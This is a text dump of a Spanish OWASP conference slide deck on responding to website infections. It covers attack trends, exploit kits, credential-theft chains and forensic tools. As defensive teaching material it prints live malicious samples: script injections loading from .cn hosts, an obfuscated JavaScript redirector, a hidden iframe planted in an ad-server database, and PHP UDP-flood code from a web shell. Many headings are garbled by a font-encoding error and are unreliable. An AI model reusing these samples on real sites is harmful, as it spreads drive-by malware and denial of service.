Upload
hoangxuyen
View
223
Download
0
Embed Size (px)
Citation preview
4/26/11
1
¿ Comida o Amenaza ?
2
Respuesta a incidentes en infecciones web
Carles Fragoso Mariscal VII OWASP Spain Chapter Meeting ! Barcelona, 15 de Abril del 2011
Organiza: Patrocina: Colabora:
4/26/11
2
!"
– Departament de Governació – Secretaria de Telecomunicacions i Societat de la Informació – Departament d’Interior – Departament d’Innovació, Universitats i Empresa – Centre de Telecomunicacions i Tecnologies de la Informació de
la Generalitat de Catalunya
• Agència ACC1Ó
• Consorci Administració Oberta de Catalunya
• Ajuntament de Reus
• Consell de Cambres de Comerç de Catalunya
• e-la Caixa
• Fundació Barcelona Digital
• Universitat Rovira i Virgili
#$%&'()*%"+,-.+/0"
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. Contexto 2. Tendencias de ataque 3. Respuesta a Incidentes 4. Conclusiones
4/26/11
3
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. Contexto 2. Tendencias de ataque 3. Respuesta a Incidentes 4. Conclusiones
¿En qué tienda…
entrarías?
Perico
Drupal
Lupita
PHPNuke
Jorgito
Joomla
La Esteban
CMS
4/26/11
4
+7%52:57;"/<2%523"
• Contenidos – Propietario de los contenidos/información/marca – Operadores/Usuarios de generación/administración de contenidos – Usuarios/visitantes
• Plataforma tecnológica
– Administradores/operadores de la plataforma – Proveedores de hosting/housing/cloud
• Infraestructura, servicio, aplicación"
– Empresas de desarrollo o integración – Proveedores de contenidos terceros (ads, widgets!)
• Seguridad – Proveedores de listas de reputación – Fabricantes de detección/contención de código malicioso – Proveedores de auditoria/revisión de aplicaciones/código ¿ Responsabilidades ?
="
¿Qué comprarías
4/26/11
5
+7%52:57;"+)92>(>)?2%"
• Los delincuentes y mafias de toda la vida se han pasado a la Internet motivados por: – Incremento del uso por parte de los usuarios – Vulnerabilidad de los sistemas – Facilidad y “anonimato” a la hora de realizar acciones remotamente – “Vacío” o lentitud en el ámbito legal-judicial
• Estos han motivado la creación de toda una colección de software malicioso y servicios pensados para el cibercrimen – Código malicioso para múltiples entornos (escritorio, web...) – Paneles de control y administración de sistemas infectados
• Las nuevas ‘armas digitales’ permiten realizar: – Robo de credenciales, datos bancarios y personales, etc. – Envío de correo basura – Ataques de denegación de servicio
10
• Bla
ISP de cibercrim
4/26/11
6
• Adrenaline Pack • Eleonore • LuckySploit • Fragus • ElFiesta • Napoleon Sploit • Siberia • Unique Pack • JustExploit • Sploit25 • Phoenix Zeus • Liberty • Neon • ZoPAck
Listado de “Exploit Packs”
4/26/11
7
• BlackEnergy • Kraken • Waledac/Storm/Nuwar • Srizbi • Gumblar • Sinowal/Torpig • Ozdok • Pushdo • Zeus • Koobface • Spyeye • Oficla/Sasfis • Mariposa
13
Lista de familias de código malicioso
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. Contexto 2. Tendencias 3. Respuesta a Incidentes 4. Conclusiones
4/26/11
8
@>79'9)A)&'&"&2"B)3$'A)C'()*%"829")%62(5'&'"
Fuente: Dasient Smartweb Security
www.piltrafilla.net
¡¡Reputación!!!
4/26/11
9
DE"
¡Infección!
¿Cómo nos… atacan?
4/26/11
10
02%&2%()'3;"+*&)<7"?'A)()737"
• Punto de inserción – Código fuente – Ficheros de inclusión – Entradas en base de datos
• Formato – Scripts (javascript) – Marcos (iframe) – Objetos (java, flash, PDF")
• Técnicas antiforenses – Ofuscación de código – Detección de crawlers y IPs de CERT/LEO – Detección de herramientas forenses
+*&)<7"?'A)()737"2%"F(G2>7"'%2:'&7"
HI"
</div> </div> </div> <script src="http://nt010.cn/E/J.JS"></script><script src='http://nt004.cn/E/J.JS'></script></body> </html> <html><body><script>function decoder(){var gfh=new Array(213,57,39,219,247,55,122,92,13,198,41,6,217,113,106,222,203,43,9,180,77,250,123,222,235,119,203,90,81,168);var scp=28;for(;scp>=1;){gfh[scp]=((((~gfh[scp])&0xff)>>7)|((((~gfh[scp])&0xff)<<1)&0xff))^gfh[0];scp--;}var scp=3;while(scp<=28){gfh[scp]=((((~gfh[scp])&0xff)^gfh[2])>>4)|(((((~gfh[scp])&0xff)^gfh[2])<<4)&0xff);scp++;}var scp=1;do{if(scp>27)break;gfh[scp]=((((((-gfh[scp])&0xff)<<7)&0xff)|(((-gfh[scp])&0xff)>>1))-234)&0xff;scp++;}while(true);return String.fromCharCode(gfh[1],gfh[2],gfh[3],gfh[10],gfh[14],gfh[16],gfh[18],gfh[20],gfh[21],gfh[23],gfh[24],gfh[26],gfh[27],gfh[28]);}window.location="/E/J.JS?"+decoder();</script><br><br><center><h3><B7><C3><CE><CA><B1><BE><D2><B3><C3><E6><A3><AC><C4><FA><B5><C4><E4><AF><C0><C0><C6><F7><D0><E8><D2><AA><D6><A7><B3><D6>JavaScript</h3></center></body></html>
4/26/11
11
+*&)<7"?'A)()737"2%"2%5>'&'"9'32"&2"&'573"
mysql> select * from ox_audit where date_sub(’YYYY-MM-DD', interval 1 day) <= updated; | auditid | actionid | context | contextid | parentid | details | userid | username | usertype | updated | account_id | advertiser_account_id | website_account_id | | 1234 | 2 | banners | 123| NULL | a:3:{s:6:"append";a:2:{s:3:"was";s:0:"";s:2:"is";s:137:"<iframe src="http://A.B.C.D/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>";}s:8:"key_desc";s:36:”CAMPAIGN NAME";s:10:"campaignid";s:3:"168";} | 1 | user | 0 | YYYY-MM-DD HH:MM:SS | 1 | 12 | NULL |
02%&2%()'3;"/9$37"
• Distribución de código malicioso • Denegación de servicio • Envío de correo basura • Redirección a contenidos: phishing, venta de viagra"
4/26/11
12
J>22%-G2AA;"K7-"LK@"M77&2>"N)%52>6'(2O"
J>22%-G2AA;"K7-"LK@"M77&2>"N(*&)<7O"
for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br>
4/26/11
13
-2%&07;",%BP7"&2"(7>>27"9'3$>'"Q"4G)3G)%<"
02%&2%()'3;"R2(57>"&2"'5'S$2"
• Compromiso masivo mediante vulnerabilidades – Ej: IIS/ASP (Lizamoon), diversos CMS"
• Inserción de código malicioso en anuncios – Ej: Software anuncios (OpenX), redes de terceros"
• Robo de credenciales FTP/HTTP – Ej: Botnet Bredolab
4/26/11
14
HE"
.%62(()*%"!"##$%&"T42%U"
4/26/11
15
'()*+,-"V)5"
J2357>"!+-#$-.
/0,&0,#1"V)5"
23%,)-"&2")%62(()*%"
+*&)<7"?'A)()737.
!+-.
12(7A2(57>"&2"
(>2&2%()'A23.
.%62(()*%"47>">797"&2"(>2&2%()'A23;"@)2C'3"
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%52:57"
Atacante Víctimas
Administrador
Propietario
4/26/11
16
Alojamiento de crimeware
1
W)5"&2"(7&)"'()*+,-.
J2357>"4+-#$-.
12(7A2(57>"(>2&2%()'A3.
Engaño al administrador con técnicas de ingeniería social
3
Publicar contenidos de phishing o de ingeniería social
2
W)5"&2"423('"
2A2(5>X%)('.
Mensajería Correo electrónico
Redes sociales
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"@>24'>'()*%!
J2357>"4+-#$-.
12(7A2(57>"(>2&2%()'A3.
Administrador infectado con código malicioso bot
4
Gestor de bots y recepción de credenciales
5
Y75.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;",%<'Z7"
4/26/11
17
12(7A2(57>"(>2&2%()'A23.
Infección de páginas web con credenciales robadas
7
Y75.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
-(>)45".%62(()*%.
Procesado de credenciales y preparación infección
6
Entrega de código infectado a los usuarios
8
'()*+,-"V)5.
J2357>"4+-#$-.
Accesos legítimos al servidor web
7 Infección y control de nuevos sistemas
9
Y75.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
4/26/11
18
Y75.
J2357>"4+-#$-.
Administración de sistemas infectados
10
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%5>7A"
Y75.
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. Contexto 2. Tendencias 3. Respuesta a Incidentes 4. Conclusiones
4/26/11
19
1234$235'"'")%()&2%523"["'%\A)3)3"67>2%32"
"#$$%&'#()%*!+,-'./! 0$/1#*/*!
• Gestores • Analistas • Forenses • Consultores
• Kit de respuesta • Intercepción • Entorno de pruebas • Herramientas forenses
• Recogida de evidencias • Análisis de información • Ingeniería inversa • Análisis forense • Investigación
#A$]7"&2">234$235'"'")%()&2%523"
!="
2#*.-#*)%!
$#&/)%!
2#*.-#*)%!
.$#*#(1'%3!
45,-'*'1'6(!
7!.$#*#$8%1'6(!
4(93'*'*!7!
'(8#*:;%1'6(! <(=/$&#*!
4/26/11
20
>#)#11'6(!
7!)$'%?#!<(=/$&#!
+$$%5'1%1'6(!
2#1-.#$%1'6(!
4(@3'*'!
A#;-'&'#()/!
45,-'*'1'6(!7!
.$#%(93'*'*!
B/()#(1'6(!
C/:D1%1'6(!
1234$235'"'")%()&2%523"
• Preparación – Entorno “sandbox” con las herramientas adecuadas y con
conectividad limitada y de forma anónima (proxies) – Kit de respuesta presencial (portátil, sonda, maletín") – Procedimiento de recogida de información en clientes y servidores
• Respuesta – Revisión estática/dinámica desde entorno sandbox con
herramientas de control del navegador (protección) – Scripts de revisión de servidor para identificar elementos infectados – Contención/monitorización mediante firmas WAF/IPS – Recogida de información preliminar de fuentes de inteligencia – Procedimiento de limpieza de máquinas infectadas – Coordinación/actuación sobre dominios y IPs de terceros
• Análisis – Análisis dinámico con herramientas tipo sandbox – Ingeniería inversa de código malicioso y otros artefactos
1234$235'"'")%()&2%523;"^257&7A7<P'"
4/26/11
21
B/$)%=-#;/*!
<()#$(#)!
+()/$(/!5#!'(8#*:;%1'6(!+()/$(/!!
5#!.$-#E%*!
+()/$(/!5#!
8'$)-%3')F%1'6(!
2/-)#$*!!
8'$)-%3#*!
1234$235'"'".%()&2%523;"_2>>'?)2%5'3"&2"'%\A)3)3"
• Análisis dinámico – Wepawet
http://wepawet.iseclab.org/
– Anubis http://anubis.iseclab.org/
• Deofuscación – Jsunpack
http://jsunpack.jeek.org/
– Malzilla http://malzilla.sourceforge.net/
• Revisión de código malicioso – Virustotal – Team Cymru Malware Hash Database
• Otros – Firefox plugins: Adblock, Noscript, StopAutoplay, Flashblock – Wireshark/Tshark ! Sysinternal Tools – Fiddler / FiddlerCap
http://www.fiddler2.com/fiddler2/
– Fireshark http://fireshark.org/
`H"
4/26/11
22
_2>>'?)2%5'3;"#)&&A2>"N5$!.6$!711$%O"
_2>>'?)2%5'3;"#)&&A2>+'4"N3")-7%"6+%O"
4/26/11
23
#)>23G'>V;"a29"/%'A[3)3""
`b"
Q2 2010: Infection Library .%67>?'()*%"&2")%52A)<2%()';"K'3)2%5".%62(c7%"d)9>'>["
4/26/11
24
www.maliciousnetworks.org
.%67>?'()*%"&2")%52A)<2%()';"#)%&)%<"17<$,"e2587>V3"
1234$235'"'".%()&2%523;".%67>?'()*%"&2")%52A)<2%()'"
• ABUSE.CH Malware Database http://amada.abuse.ch/
• Malc0de Database http://malc0de.com/database/index.php
• Malware Domain List http://www.malwaredomainlist.com/mdl.php
• Host Exploit http://hostexploit.com/
• Malicious Networks http://www.maliciousnetworks.org
• Google Safebrowsing http://www.google.com/safebrowsing/diagnostic?site=dominio.tld
`="
4/26/11
25
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. Contexto 2. Tendencias 3. Respuesta a Incidentes 4. Conclusiones
Conclusiones
4/26/11
26
+7%(A$3)7%23"
• Las infecciones de tipo web se están incrementado exponencialmente • Los navegadores web siguen contando con vulnerabilidades
sobretodo en los complementos de terceros • Los servidores web siguen siendo expuestos debido a
vulnerabilidades en los CMS y por el robo de credenciales de sus operadores/administradores
• Los sistemas de reputación están ayudando ante incidentes masivos pero no son una bala de plata
• La sofisticación del código malicioso web va en aumento para evitar su detección y análisis
bD"
52
1=$%;/*/G1#*'1%)H1%)!!!888f(23)('5f('5"G1#*'1%)